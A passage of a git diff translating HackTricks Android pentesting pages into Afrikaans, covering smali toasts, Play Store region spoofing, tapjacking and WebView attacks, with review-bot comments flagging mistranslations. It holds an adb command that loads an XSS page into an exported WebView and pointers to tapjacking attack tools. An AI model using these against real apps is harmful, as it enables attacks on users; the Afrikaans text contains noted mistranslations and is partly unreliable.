Ex: from _.locals 10_ to _.locals 12_ - * The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0). - * Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_. +### Rooster -### Toasting - -Remember to add 3 to the number of _.locals_ at the beginning of the function. - -This code is prepared to be inserted in the **middle of a function** (**change** the number of the **variables** as necessary). It will take the **value of this.o**, **transform** it to **String** and them **make** a **toast** with its value. +Onthou om 3 by die aantal _.locals_ aan die begin van die funksie te voeg. 
+Hierdie kode is gereed om in die **middel van 'n funksie** **ingevoeg** te word (**verander** die nommer van die **veranderlikes** soos nodig). Dit sal die **waarde van this.o** neem, dit na 'n **String** omskep en dan 'n **rooster** maak met sy waarde. ```bash const/4 v10, 0x1 const/4 v11, 0x1 @@ -196,17 +217,16 @@ invoke-static {p0, v11, v12}, Landroid/widget/Toast;->makeText(Landroid/content/ move-result-object v12 invoke-virtual {v12}, Landroid/widget/Toast;->show()V ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
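Review bot: the `+### Basiese Operasies` block in the first smali-changes.md hunk adds ten subsections ("Smali-lêers wysig" through "Smali-lêers onderteken") that have no counterpart in the removed English text, which was only the heading `-### Basic Operations` followed by the math/compare Smali listing; a translation PR should not introduce content, and several of the invented items are wrong (item 10 says Smali files must be signed, whereas it is the rebuilt APK that is signed; items 6 and 7 describe resources and the manifest as living inside Smali files, which they do not). Drop the whole added block and keep only the translated heading. Two smaller points in the same file: `+### Rooster` renders "Toasting" as a timetable or grid, while the section is about the Android `Toast` popup (`Landroid/widget/Toast;->makeText` is right there in the listing), so keep "Toast" as the technical term; and under `+Aanbevelings:` the three sub-bullets that were indented under "If you want to put the logging code in the middle of the code of a function" have been flattened to top-level bullets, losing the nesting that marks them as steps of that case. Restore the indentation.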
diff --git a/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md index fb0d43259..d9446bc8b 100644 --- a/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md +++ b/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md @@ -1,61 +1,57 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-In situations where an application is restricted to certain countries, and you're unable to install it on your Android device due to regional limitations, spoofing your location to a country where the app is available can grant you access. The steps below detail how to do this: +In situasies waar 'n toepassing beperk is tot sekere lande en jy dit nie op jou Android-toestel kan installeer nie as gevolg van streekbeperkings, kan die vervalsing van jou ligging na 'n land waar die toepassing beskikbaar is, jou toegang verleen. Die stappe hieronder beskryf hoe om dit te doen: -1. **Install Hotspot Shield Free VPN Proxy:** - - Begin by downloading and installing the Hotspot Shield Free VPN Proxy from the Google Play Store. +1. **Installeer Hotspot Shield Free VPN Proxy:** +- Begin deur die Hotspot Shield Free VPN Proxy van die Google Play Store af te laai en te installeer. -2. **Connect to a VPN Server:** - - Open the Hotspot Shield application. - - Connect to a VPN server by selecting the country where the application you want to access is available. +2. **Koppel aan 'n VPN-bediener:** +- Maak die Hotspot Shield-toepassing oop. +- Koppel aan 'n VPN-bediener deur die land te kies waar die toepassing wat jy wil toegang tot verkry, beskikbaar is. -3. **Clear Google Play Store Data:** - - Navigate to your device's **Settings**. - - Proceed to **Apps** or **Application Manager** (this may differ depending on your device). - - Find and select **Google Play Store** from the list of apps. - - Tap on **Force Stop** to terminate any running processes of the app. - - Then tap on **Clear Data** or **Clear Storage** (the exact wording may vary) to reset the Google Play Store app to its default state. +3. **Maak Google Play Store-data skoon:** +- Navigeer na jou toestel se **Instellings**. +- Gaan voort na **Toepassings** of **Toepassingsbestuurder** (dit kan verskil afhangende van jou toestel). +- Vind en kies **Google Play Store** uit die lys van toepassings. 
+- Tik op **Gedwonge Stop** om enige lopende prosesse van die toepassing te beëindig. +- Tik dan op **Data skoonmaak** of **Stoor skoonmaak** (die presiese bewoording kan verskil) om die Google Play Store-toepassing na sy verstektoestand te herstel. -4. **Access the Restricted Application:** - - Open the **Google Play Store**. - - The store should now reflect the content of the country you connected to via the VPN. - - You should be able to search for and install the application that was previously unavailable in your actual location. +4. **Kry toegang tot die beperkte toepassing:** +- Maak die **Google Play Store** oop. +- Die winkel moet nou die inhoud van die land weerspieël waaraan jy gekoppel het via die VPN. +- Jy behoort die toepassing wat voorheen nie beskikbaar was in jou werklike ligging te kan soek en installeer. -### Important Notes: -- The effectiveness of this method can vary based on several factors including the VPN service's reliability and the specific regional restrictions imposed by the app. -- Regularly using a VPN may affect the performance of some apps and services. -- Be aware of the terms of service for any app or service you're using, as using a VPN to bypass regional restrictions may violate those terms. +### Belangrike Notas: +- Die doeltreffendheid van hierdie metode kan wissel op grond van verskeie faktore, insluitend die betroubaarheid van die VPN-diens en die spesifieke streekbeperkings wat deur die toepassing opgelê word. +- Die gereelde gebruik van 'n VPN kan die prestasie van sommige toepassings en dienste beïnvloed. +- Wees bewus van die diensvoorwaardes vir enige toepassing of diens wat jy gebruik, aangesien die gebruik van 'n VPN om streekbeperkings te omseil, hierdie voorwaardes mag oortree. -## References +## Verwysings * [https://manifestsecurity.com/android-application-security-part-23/](https://manifestsecurity.com/android-application-security-part-23/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/mobile-pentesting/android-app-pentesting/tapjacking.md b/mobile-pentesting/android-app-pentesting/tapjacking.md index 46883bf72..e8a9cc9a5 100644 --- a/mobile-pentesting/android-app-pentesting/tapjacking.md +++ b/mobile-pentesting/android-app-pentesting/tapjacking.md @@ -2,88 +2,85 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** +## **Basiese Inligting** -**Tapjacking** is an attack where a **malicious** **application** is launched and **positions itself on top of a victim application**. Once it visibly obscures the victim app, its user interface is designed in such a way as to trick the user to interact with it, while it is passing the interaction along to the victim app.\ -In effect, it is **blinding the user from knowing they are actually performing actions on the victim app**. +**Tapjacking** is 'n aanval waar 'n **boosaardige** **toepassing** geloods word en **sigself bo-op 'n slagoffer-toepassing plaas**. Sodra dit die slagoffer-toepassing sigbaar bedek, is sy gebruikerskoppelvlak so ontwerp dat dit die gebruiker mislei om daarmee te interaksieer, terwyl dit die interaksie aan die slagoffer-toepassing deurgee.\ +In werklikheid **verblind dit die gebruiker om te weet dat hulle eintlik handelinge op die slagoffer-toepassing uitvoer**. -### Detection +### Opmerking -In order to detect apps vulnerable to this attacked you should search for **exported activities** in the android manifest (note that an activity with an intent-filter is automatically exported by default). Once you have found the exported activities, **check if they require any permission**. This is because the **malicious application will need that permission also**. +Om toepassings wat vatbaar is vir hierdie aanval op te spoor, moet jy soek na **uitgevoerde aktiwiteite** in die Android-manifes (let daarop dat 'n aktiwiteit met 'n intent-filter outomaties uitgevoer word as gevolg van verstek). Sodra jy die uitgevoerde aktiwiteite gevind het, **kyk of hulle enige toestemming vereis**. Dit is omdat die **boosaardige toepassing ook daardie toestemming sal nodig hê**. 
-### Protection +### Beskerming -#### Android 12 (API 31,32) and higher +#### Android 12 (API 31,32) en hoër -[**According to this source**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** tapjacking attacks are automatically prevented by Android from Android 12 (API 31 & 30) and higher. So, even if the application is vulnerable you **won't be able to exploit it**. +[**Volgens hierdie bron**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** word tapjacking-aanvalle outomaties voorkom deur Android vanaf Android 12 (API 31 & 30) en hoër. So, selfs as die toepassing vatbaar is, **sal jy nie in staat wees om dit uit te buit nie**. #### `filterTouchesWhenObscured` -If **`android:filterTouchesWhenObscured`** is set to **`true`**, the `View` will not receive touches whenever view's window is obscured by another visible window. +As **`android:filterTouchesWhenObscured`** op **`true`** ingestel is, sal die `View` nie aanrakings ontvang wanneer die venster van die weergawe bedek word deur 'n ander sigbare venster nie. #### **`setFilterTouchesWhenObscured`** -The attribute **`setFilterTouchesWhenObscured`** set to true can also prevent the exploitation of this vulnerability if the Android version is lower.\ -If set to **`true`**, for example, a button can be automatically **disabled if it is obscured**: - +Die eienskap **`setFilterTouchesWhenObscured`** wat op true ingestel is, kan ook die uitbuiting van hierdie kwesbaarheid voorkom as die Android-weergawe laer is.\ +As dit op **`true`** ingestel is, kan byvoorbeeld 'n knoppie outomaties **gedeaktiveer word as dit bedek word**: ```xml ``` - -## Exploitation +## Uitbuiting ### Tapjacking-ExportedActivity -The most **recent Android application** performing a Tapjacking attack (+ invoking before an exported activity of the attacked application) can be found in: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity). 
+Die mees onlangse Android-toepassing wat 'n Tapjacking-aanval uitvoer (+ voor die uitgevoerde aktiwiteit van die aangevalle toepassing roep) kan gevind word by: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity). -Follow the **README instructions to use it**. +Volg die **README-instruksies om dit te gebruik**. ### FloatingWindowApp -An example project implementing **FloatingWindowApp**, which can be used to put on top of other activities to perform a clickjacking attack, can be fund in [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (a bit old, good luck building the apk). +'n Voorbeeldprojek wat **FloatingWindowApp** implementeer, wat gebruik kan word om bo-op ander aktiwiteite te plaas om 'n clickjacking-aanval uit te voer, kan gevind word by [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (bietjie oud, sterkte met die bou van die apk). ### Qark {% hint style="danger" %} -It looks like this project is now unmaintained and this functionality isn't properly working anymore +Dit lyk asof hierdie projek nou nie meer onderhou word nie en hierdie funksionaliteit nie meer behoorlik werk nie. {% endhint %} -You can use [**qark**](https://github.com/linkedin/qark) with the `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` parameters to create a malicious application to test for possible **Tapjacking** vulnerabilities.\ +Jy kan [**qark**](https://github.com/linkedin/qark) gebruik met die `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` parameters om 'n skadelike toepassing te skep om te toets vir moontlike **Tapjacking**-kwesbaarhede. +Die beperking is relatief eenvoudig, aangesien die ontwikkelaar kan kies om nie aanrakinggebeure te ontvang wanneer 'n weergawe deur 'n ander bedek word nie. 
Gebruik die [Android Developer's Reference](https://developer.android.com/reference/android/view/View#security): -The mitigation is relatively simple as the developer may choose not to receive touch events when a view is covered by another. Using the [Android Developer’s Reference](https://developer.android.com/reference/android/view/View#security): - -> Sometimes it is essential that an application be able to verify that an action is being performed with the full knowledge and consent of the user, such as granting a permission request, making a purchase or clicking on an advertisement. Unfortunately, a malicious application could try to spoof the user into performing these actions, unaware, by concealing the intended purpose of the view. As a remedy, the framework offers a touch filtering mechanism that can be used to improve the security of views that provide access to sensitive functionality. +> Soms is dit noodsaaklik dat 'n toepassing kan verifieer dat 'n aksie met die volle kennis en toestemming van die gebruiker uitgevoer word, soos die verlening van 'n toestemmingsversoek, 'n aankoop doen of op 'n advertensie klik. Ongelukkig kan 'n skadelike toepassing probeer om die gebruiker te mislei om hierdie aksies uit te voer, sonder om bewus te wees daarvan, deur die beoogde doel van die weergawe te verberg. As 'n remedie bied die raamwerk 'n aanrakingsfiltermeganisme wat gebruik kan word om die veiligheid van weergawes wat toegang tot sensitiewe funksionaliteit bied, te verbeter. > -> To enable touch filtering, call [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) or set the android:filterTouchesWhenObscured layout attribute to true. When enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. 
As a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window. +> Om aanrakingsfiltering te aktiveer, roep [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) aan of stel die android:filterTouchesWhenObscured-uitlegkenmerk in op true. Wanneer dit geaktiveer is, sal die raamwerk aanrakings wat ontvang word, verwerp wanneer die venster van die weergawe bedek word deur 'n ander sigbare venster. As gevolg hiervan sal die weergawe nie aanrakings ontvang wanneer 'n toost, dialoogvenster of ander venster bo die venster van die weergawe verskyn nie.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
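Review bot: several Android technical terms in the tapjacking.md hunk are translated into words with a different meaning, which changes the security advice. `+### Opmerking` ("remark") replaces "Detection"; use "Opsporing". "Exported activities" becomes "uitgevoerde aktiwiteite" ("executed activities"), but the paragraph is about the `android:exported` manifest attribute, so keep "exported" (for instance "geëksporteerde aktiwiteite"). Throughout the protection section and the quoted developer reference, `View` is rendered as "weergawe" ("version"), so `+... nie aanrakings ontvang wanneer die venster van die weergawe bedek word ...` reads as "the window of the version"; keep `View` as the class name. Also, the translated qark line `+Jy kan ... **Tapjacking**-kwesbaarhede.` drops the blank line that separated it from the mitigation paragraph, so the two now render as one paragraph; and, carried over from the source, the heading says "(API 31,32)" while the sentence below says "(API 31 & 30)", which is worth reconciling while this text is being rewritten.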
diff --git a/mobile-pentesting/android-app-pentesting/webview-attacks.md b/mobile-pentesting/android-app-pentesting/webview-attacks.md index ad1818e0b..388e6348f 100644 --- a/mobile-pentesting/android-app-pentesting/webview-attacks.md +++ b/mobile-pentesting/android-app-pentesting/webview-attacks.md @@ -1,156 +1,141 @@ -# Webview Attacks +# Webweergawe-aanvalle
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Simplified Guide on WebView Configurations and Security +## Vereenvoudigde Gids oor WebView-konfigurasies en -veiligheid -### Overview of WebView Vulnerabilities +### Oorsig van WebView-gebreklikhede -A critical aspect of Android development involves the correct handling of WebViews. This guide highlights key configurations and security practices to mitigate risks associated with WebView usage. +'n Kritieke aspek van Android-ontwikkeling behels die korrekte hantering van WebViews. Hierdie gids beklemtoon sleutelkonfigurasies en veiligheidspraktyke om risiko's wat verband hou met WebView-gebruik te verminder. -![WebView Example](../../.gitbook/assets/image%20(718).png) +![Voorbeeld van WebView](../../.gitbook/assets/image%20(718).png) -### **File Access in WebViews** +### **Lêertoegang in WebViews** -By default, WebViews permit file access. This functionality is controlled by the `setAllowFileAccess()` method, available since Android API level 3 (Cupcake 1.5). Applications with the **android.permission.READ_EXTERNAL_STORAGE** permission can read files from external storage using a file URL scheme (`file://path/to/file`). +Standaard staan WebViews lêertoegang toe. Hierdie funksionaliteit word beheer deur die `setAllowFileAccess()`-metode, beskikbaar sedert Android API-vlak 3 (Cupcake 1.5). Aansoeke met die **android.permission.READ_EXTERNAL_STORAGE**-toestemming kan lêers van eksterne stoorplek lees deur 'n lêer-URL-skema (`file://path/to/file`) te gebruik. -#### **Deprecated Features: Universal and File Access From URLs** +#### **Verouderde kenmerke: Universele en lêertoegang vanaf URL's** -- **Universal Access From File URLs**: This deprecated feature allowed cross-origin requests from file URLs, posing a significant security risk due to potential XSS attacks. The default setting is disabled (`false`) for apps targeting Android Jelly Bean and newer. - - To check this setting, use `getAllowUniversalAccessFromFileURLs()`. 
- - To modify this setting, use `setAllowUniversalAccessFromFileURLs(boolean)`. +- **Universele toegang vanaf lêer-URL's**: Hierdie verouderde kenmerk het kruis-oorsprong-versoeke vanaf lêer-URL's toegelaat, wat 'n beduidende veiligheidsrisiko inhou as gevolg van potensiële XSS-aanvalle. Die verstekinstelling is gedeaktiveer (`false`) vir programme wat Android Jelly Bean en nuwer teiken. +- Om hierdie instelling te kontroleer, gebruik `getAllowUniversalAccessFromFileURLs()`. +- Om hierdie instelling te wysig, gebruik `setAllowUniversalAccessFromFileURLs(boolean)`. -- **File Access From File URLs**: This feature, also deprecated, controlled access to content from other file scheme URLs. Like universal access, its default is disabled for enhanced security. - - Use `getAllowFileAccessFromFileURLs()` to check and `setAllowFileAccessFromFileURLs(boolean)` to set. +- **Lêertoegang vanaf lêer-URL's**: Hierdie kenmerk, ook verouderd, beheer toegang tot inhoud vanaf ander lêerskema-URL's. Soos universele toegang, is die verstekinstelling gedeaktiveer vir verbeterde veiligheid. +- Gebruik `getAllowFileAccessFromFileURLs()` om te kontroleer en `setAllowFileAccessFromFileURLs(boolean)` om in te stel. -#### **Secure File Loading** +#### **Veilige lêerlaai** -For disabling file system access while still accessing assets and resources, the `setAllowFileAccess()` method is used. With Android R and above, the default setting is `false`. -- Check with `getAllowFileAccess()`. -- Enable or disable with `setAllowFileAccess(boolean)`. +Vir die deaktivering van lêersisteemtoegang terwyl toegang tot bates en hulpbronne steeds behou word, word die `setAllowFileAccess()`-metode gebruik. Met Android R en hoër is die verstekinstelling `false`. +- Kontroleer met `getAllowFileAccess()`. +- Aktiveer of deaktiveer met `setAllowFileAccess(boolean)`. #### **WebViewAssetLoader** -The **WebViewAssetLoader** class is the modern approach for loading local files. 
It uses http(s) URLs for accessing local assets and resources, aligning with the Same-Origin policy, thus facilitating CORS management. +Die **WebViewAssetLoader**-klas is die moderne benadering vir die laai van plaaslike lêers. Dit gebruik http(s)-URL's om plaaslike bates en hulpbronne te benader, in lyn met die Same-Origin-beleid, wat CORS-bestuur vergemaklik. -### **JavaScript and Intent Scheme Handling** +### **JavaScript en Intent-skemahandtering** -- **JavaScript**: Disabled by default in WebViews, it can be enabled via `setJavaScriptEnabled()`. Caution is advised as enabling JavaScript without proper safeguards can introduce security vulnerabilities. +- **JavaScript**: Standaard gedeaktiveer in WebViews, dit kan geaktiveer word deur middel van `setJavaScriptEnabled()`. Voorsoorsigtigheid word aanbeveel, aangesien die aktivering van JavaScript sonder behoorlike veiligheidsmaatreëls veiligheidskwessies kan veroorsaak. -- **Intent Scheme**: WebViews can handle the `intent` scheme, potentially leading to exploits if not carefully managed. An example vulnerability involved an exposed WebView parameter "support_url" that could be exploited to execute cross-site scripting (XSS) attacks. +- **Intent-skema**: WebViews kan die `intent`-skema hanteer, wat potensieel kan lei tot uitbuitings as dit nie sorgvuldig bestuur word nie. 'n Voorbeeld van 'n kwesbaarheid het betrekking op 'n blootgestelde WebView-parameter "support_url" wat uitgebuit kon word om kruissite-skripsie (XSS) aanvalle uit te voer. 
-![Vulnerable WebView](../../.gitbook/assets/image%20(719).png) - -Exploitation example using adb: +![Kwesbare WebView](../../.gitbook/assets/image%20(719).png) +Voorbeeld van uitbuiting met behulp van adb: ```bash adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView –es support_url "https://example.com/xss.html" ``` +### Javascript-brug -### Javascript Bridge +'n Funksie word deur Android voorsien wat dit moontlik maak vir **JavaScript** in 'n WebView om **nagtiewe Android-app-funksies** aan te roep. Dit word bereik deur die gebruik van die `addJavascriptInterface`-metode, wat JavaScript integreer met nagtiewe Android-funksies, bekend as 'n _WebView JavaScript-brug_. Voorsoorsigtigheid word aanbeveel, aangesien hierdie metode alle bladsye binne die WebView in staat stel om toegang te verkry tot die geregistreerde JavaScript-brugobjek, wat 'n veiligheidsrisiko inhou as sensitiewe inligting deur hierdie brûe blootgestel word. -A feature is provided by Android that enables **JavaScript** in a WebView to invoke **native Android app functions**. This is achieved by utilizing the `addJavascriptInterface` method, which integrates JavaScript with native Android functionalities, termed as a _WebView JavaScript bridge_. Caution is advised as this method allows all pages within the WebView to access the registered JavaScript Interface object, posing a security risk if sensitive information is exposed through these interfaces. +### Belangrike oorwegings -### Important Considerations +- **Uiterste voorsoorsigtigheid is nodig** vir programme wat Android-weergawes onder 4.2 teiken as gevolg van 'n kwesbaarheid wat afstandsbeheer deur middel van skadelike JavaScript moontlik maak deur refleksie te benut. -- **Extreme caution is required** for apps targeting Android versions below 4.2 due to a 